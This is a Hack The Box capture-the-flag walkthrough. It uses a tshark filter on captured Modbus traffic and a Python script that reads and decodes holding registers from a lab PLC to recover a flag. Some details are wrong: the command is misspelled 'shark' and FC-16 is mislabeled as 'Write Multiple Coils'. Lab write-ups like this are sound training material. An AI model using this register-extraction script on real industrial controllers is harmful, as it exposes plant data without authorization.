HTB – Intrusion Walkthrough

Description

Plattform: Hack the Box
Link: https://app.hackthebox.com/challenges/525
Difficulty: easy 🟢

Introduction

After gaining access to the enemy infrastructure, we have collected critical network traffic data from their Modbus network. Our primary objective is to quickly identify the specific registers containing highly sensitive information and extract this data.

Scope

  • Identify important traffic in the PCAP file
  • Extract information from the PLC

Traffic analysis

In this case, the „Write Multiple Coils“ traffic is of interest, specifically Function Code 16 (FC-16).

You could manually extract the data, or alternatively, use Tshark to output it directly.

 shark -r network_logs.pcapng -Y "modbus.func_code == 16" -T fields -e modbus.reference_num

Reading Registers from the PLC

Now, the values of individual registers need to be read. This can be done using the script from the download files or by writing a custom script.

I preferred to build my own:

from pyModbusTCP.client import ModbusClient

HOST = "94.237.60.64"
PORT = 51447
UNIT_ID = 52  # Unit-ID

registers = [
    6, 10, 12, 21, 22, 26, 47, 53, 63, 77, 83, 86, 89, 95, 96, 104, 123, 128, 131, 134,
    139, 143, 144, 145, 153, 163, 168, 173, 179, 193, 206, 210, 214, 215, 219, 221, 224,
    225, 226, 231, 239, 253
]

client = ModbusClient(host=HOST, port=PORT, unit_id=UNIT_ID, auto_open=True)

if not client.open():
    print("Error: Connection failed!")
    exit()


result_text = ""

for reg in registers:
    val = client.read_holding_registers(reg, 1)

    if val is None:
        print(f"Error: Unable to read Reg {reg}")
        continue

    raw_text = "".join(chr(v >> 8) + chr(v & 0xFF) for v in val)

    #Filter charackters
    cleaned_text = "".join(c for c in raw_text if 32 <= ord(c) <= 126)

    
    result_text += cleaned_text

client.close()

print(result_text)

If everything was done correctly, the flag will be displayed.